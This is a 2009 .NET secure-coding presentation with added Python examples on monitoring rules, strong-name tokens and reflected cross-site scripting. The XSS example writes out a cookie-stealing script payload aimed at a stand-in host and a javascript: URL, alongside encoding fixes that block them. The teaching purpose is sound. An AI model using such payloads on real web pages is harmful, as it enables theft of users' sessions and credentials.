Writing Secure Code By Sam Nasr, MCAD, MCT, MCTS March 18, 2009.

Agenda: Introduction; Security overview; Security procedural coding; Q&A

About me… Sam Nasr, Independent Software Consultant, Nasr Information Systems. Software developer since 1995. MCAD, MCT, MCTS (WSS/MOSS). President, Cleveland C#/VB.Net User Group. Contact Info: Blog: ClevelandDotNet.blogspot.com/

Setting Expectations. What will be covered: an overview of security in the .Net Framework; some coding techniques (limited by time); a take-home laundry list; a discussion of code and organizational policies. What will NOT be covered: COM and ActiveX; DB security; identifying security bugs.

Why Security? Protect the data: credit card numbers, corporate data (financial info), patient information. Ensure app integrity: prevent loss of revenue (e.g. $1 plane tickets), preserve uptime (DoS attacks). Ensure app authenticity: customers run the intended applications.

What are the odds? 1 developer vs. many hackers; 1 developer hour vs. many hacker hours; salary vs. personal pride; focused vs. continuous attempts.

Points of Entry

Holistic Security: physical location of servers; ALL servers (app and DB) must be configured for security; train users against social engineering; security code review; security testing; practice active defense; recovery plan; keep your users aware of the security risk.

Active Defense Monitoring: out-of-bounds pricing; excessive number of transactions; after-hours access; extended login time.
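The four monitoring signals above turned into detection rules and run over a constructed event log. This is an added example in Python, not code from the presentation; the event schema, the thresholds (business hours 08:00 to 18:00, a paid price outside 50% to 200% of list, more than 3 purchases in 5 minutes, sessions over 8 hours) and the user names are assumptions chosen for the demonstration.

```python
"""Active-defense monitoring rules: out-of-bounds pricing, transaction velocity,
after-hours access and extended login, evaluated over an in-memory event log."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed thresholds; a real deployment tunes these per application.
BUSINESS_HOURS = (8, 18)                  # logins expected between 08:00 and 18:00 local
PRICE_BAND = (0.5, 2.0)                   # paid must lie within 50%..200% of list price
MAX_PURCHASES = 3                         # more than this many purchases per user ...
PURCHASE_WINDOW = timedelta(minutes=5)    # ... inside this window is "excessive"
MAX_SESSION = timedelta(hours=8)          # a session longer than this is "extended login"

# Constructed sample events (assumed schema: ts, user, type, plus type-specific fields).
EVENTS = [
    {"ts": "2009-03-18T09:00:00", "user": "alice",   "type": "login"},
    {"ts": "2009-03-18T09:05:00", "user": "alice",   "type": "purchase", "paid": 350.00, "list": 350.00},
    {"ts": "2009-03-18T16:00:00", "user": "alice",   "type": "logout", "login_ts": "2009-03-18T09:00:00"},
    {"ts": "2009-03-18T03:10:00", "user": "mallory", "type": "login"},
    {"ts": "2009-03-18T03:11:00", "user": "mallory", "type": "purchase", "paid": 1.00, "list": 350.00},
    {"ts": "2009-03-18T03:11:20", "user": "mallory", "type": "purchase", "paid": 1.00, "list": 350.00},
    {"ts": "2009-03-18T03:11:40", "user": "mallory", "type": "purchase", "paid": 1.00, "list": 350.00},
    {"ts": "2009-03-18T03:12:00", "user": "mallory", "type": "purchase", "paid": 1.00, "list": 350.00},
    {"ts": "2009-03-19T03:30:00", "user": "mallory", "type": "logout", "login_ts": "2009-03-18T03:10:00"},
]


def ts(ev):
    return datetime.fromisoformat(ev["ts"])


def price_out_of_bounds(ev):
    """The $1 plane ticket: paid price not positive or outside the band around list price."""
    lo, hi = PRICE_BAND
    return ev["paid"] <= 0 or not (lo * ev["list"] <= ev["paid"] <= hi * ev["list"])


def after_hours(ev):
    start, end = BUSINESS_HOURS
    return not (start <= ts(ev).hour < end)


def session_too_long(ev):
    return ts(ev) - datetime.fromisoformat(ev["login_ts"]) > MAX_SESSION


def run_monitor(events):
    """Return alerts as (rule, user, ts) tuples, evaluating events in timestamp order."""
    alerts = []
    recent = defaultdict(deque)           # user -> purchase timestamps inside the window
    for ev in sorted(events, key=ts):
        kind, user, when = ev["type"], ev["user"], ev["ts"]
        if kind == "purchase":
            if price_out_of_bounds(ev):
                alerts.append(("out_of_bounds_price", user, when))
            window = recent[user]
            window.append(ts(ev))
            while window and ts(ev) - window[0] > PURCHASE_WINDOW:
                window.popleft()          # drop purchases that fell out of the window
            if len(window) > MAX_PURCHASES:
                alerts.append(("excessive_transactions", user, when))
        elif kind == "login" and after_hours(ev):
            alerts.append(("after_hours_access", user, when))
        elif kind == "logout" and session_too_long(ev):
            alerts.append(("extended_login", user, when))
    return alerts


def summary(events):
    """Alert counts keyed by (rule, user); handy for a dashboard or a test."""
    counts = defaultdict(int)
    for rule, user, _ in run_monitor(events):
        counts[(rule, user)] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in run_monitor(EVENTS):
        print(*alert)
```

On the constructed log, alice trips nothing; mallory trips every rule: one after-hours login, four underpriced purchases, one velocity alert on the fourth purchase inside the window, and one extended session on logout. The rules are deliberately stateless apart from the per-user sliding window, which is what makes them cheap to run inline in the order-processing path rather than only in a nightly report.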

.Net 101 (know the basics): What is the code compiled to? How does the code execute? How is the JIT used? How is the CLR used?

Security Namespaces: System.Security; System.Web.Security; System.Security.Cryptography; System.Security.Principal; System.Security.Policy; System.Security.Permissions.

Demo ILDASM/ILASM

Security Tools: Dotfuscator; FxCop; Anti-Cross Site Scripting Library; Security Assessment Tool.

Strong Names: a private/public key pair and a public key token. A fully qualified name consists of the regular name (BookInventory), the version number ( ), the culture (neutral) and the public key token. Note: protect the private key; utilize AssemblyDelaySign so developers build against the public key only.
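How the public key token in that fully qualified name is derived, as an added example in Python (the real tooling is sn.exe; this is not code from the presentation). The token is the last 8 bytes of the SHA-1 hash of the public key blob, written in reverse byte order, which is what `sn -t` prints for a public key file. The BookInventory key blob below is a constructed stand-in, not a real RSA key; the derivation depends only on the bytes.

```python
"""Strong-name public key token: derivation, display name, and the check a
consumer makes when it pins the key its dependency must be signed with."""
import hashlib


def public_key_token(public_key_blob: bytes) -> str:
    """Last 8 bytes of SHA-1(blob), reversed, as lowercase hex (16 characters)."""
    digest = hashlib.sha1(public_key_blob).digest()
    return digest[-8:][::-1].hex()


def display_name(name: str, version: str, culture: str, public_key_blob: bytes) -> str:
    """The four-part identity the slide lists: name, version, culture, token."""
    return (f"{name}, Version={version}, Culture={culture}, "
            f"PublicKeyToken={public_key_token(public_key_blob)}")


def token_matches(public_key_blob: bytes, expected_token: str) -> bool:
    """A consumer pins the token it expects; a blob from any other key fails here.
    This proves which key is claimed, not that the assembly is untampered: that is
    the job of the signature check over the assembly hash, which needs the full key."""
    return public_key_token(public_key_blob) == expected_token.strip().lower()


# Constructed stand-in for a 160-byte public key blob (not a real RSA key).
BOOK_INVENTORY_KEY = bytes(range(160))
# A second constructed blob, standing in for an attacker's own key pair.
ATTACKER_KEY = bytes(range(1, 161))


if __name__ == "__main__":
    print(display_name("BookInventory", "1.0.0.0", "neutral", BOOK_INVENTORY_KEY))
    print("attacker key accepted:",
          token_matches(ATTACKER_KEY, public_key_token(BOOK_INVENTORY_KEY)))
```

Two consequences follow from the derivation. Because the token is a hash of the public key only, an attacker who generates a fresh key pair cannot reproduce your token, so a reference pinned to your token will not bind to their assembly. But if your private key leaks, their assemblies carry your token and pass every strong-name check, which is why the slide says to protect the private key and to delay-sign in development so the private key never sits on developer machines.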

Demo Strong Names

Anti-Cross Site Scripting Library. A Cross Site Scripting attack (XSS): a hacker inserts a link in an e-mail or web forum that appears to be legitimate (e.g. cnn.com, google.com). However, the link actually carries malicious script code embedded in the URL. When the unsuspecting user clicks the link, the host web site echoes the URL parameter into its page without encoding it, so the script executes in the victim's browser under the host site's origin. The script code may be used to transfer cookies from the victim's browser to the hacker's machine. The cookies may contain user IDs, passwords, or possibly credit card information, all of which can be used for illegal purposes. The library's job is to encode untrusted output for the HTML context it is written into, so injected script is rendered as text instead of executed.
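The reflected XSS described above, with the vulnerable page beside its hardened form. This is an added example written in Python to illustrate the principle rather than the .NET Anti-XSS library itself (whose HtmlEncode, HtmlAttributeEncode and UrlEncode methods do the same context-specific encoding for ASP.NET). The attacker host `attacker.invalid`, the page layout and the payload are constructed for the demonstration.

```python
"""Reflected XSS: untrusted query parameter concatenated into HTML, then the
same page with each insertion encoded for the context it lands in."""
import html
from urllib.parse import quote, urlsplit

# Constructed attacker input: closes the value="" attribute the page echoes it
# into, then injects a script that ships document.cookie to the attacker.
PAYLOAD = ('"><script>new Image().src="http://attacker.invalid/c?"'
           '+encodeURIComponent(document.cookie)</script>')


def render_unsafe(search: str, next_url: str) -> str:
    """Vulnerable pattern: parameters concatenated straight into the markup."""
    return (f'<input name="q" value="{search}">'
            f'<p>Results for {search}</p>'
            f'<a href="/search?q={search}">permalink</a>'
            f'<a href="{next_url}">continue</a>')


def encode_for_html(s: str) -> str:
    """Element body and quoted attribute contexts: & < > " ' become entities."""
    return html.escape(s, quote=True)


def encode_for_url_parameter(s: str) -> str:
    """Query-string context: percent-encode everything that is not unreserved."""
    return quote(s, safe="")


def safe_href(url: str) -> str:
    """href context. Encoding alone is not enough here: a javascript: or data:
    URL runs code even when entity-encoded, so allow only http(s) or a local
    path, then HTML-encode the survivor. Anything else collapses to '#'."""
    u = url.strip()
    if any(ord(c) < 0x20 for c in u):        # browsers skip stray control chars
        return "#"                            # in schemes; urlsplit does not
    parts = urlsplit(u)
    if parts.scheme:
        if parts.scheme.lower() not in ("http", "https"):
            return "#"
    elif not (u.startswith("/") and not u.startswith("//")):
        return "#"                            # rejects scheme-relative //host
    return encode_for_html(u)


def render_safe(search: str, next_url: str) -> str:
    """Hardened page: the same four insertions, each encoded for its context."""
    return (f'<input name="q" value="{encode_for_html(search)}">'
            f'<p>Results for {encode_for_html(search)}</p>'
            f'<a href="/search?q={encode_for_url_parameter(search)}">permalink</a>'
            f'<a href="{safe_href(next_url)}">continue</a>')


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD, "javascript:alert(document.cookie)"))
    print(render_safe(PAYLOAD, "javascript:alert(document.cookie)"))
```

The point the unsafe/safe pair makes is that there is no single "encode" call: the same string needs entity encoding in the body and the attribute, percent encoding inside the query string, and a scheme allow-list in the href, because each context has a different set of characters that switch the parser from data back to code. Marking the session cookie HttpOnly limits what a successful injection can steal, but it does not stop the injection.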

Demo FXCop

Demo Security Assessment Tool

Conclusion: let's recap… Procedural coding.


Questions?

Contact Info Sam Nasr Blog: ClevelandDotNet.blogspot.com/ Cleveland C#/VB.Net User Group Web: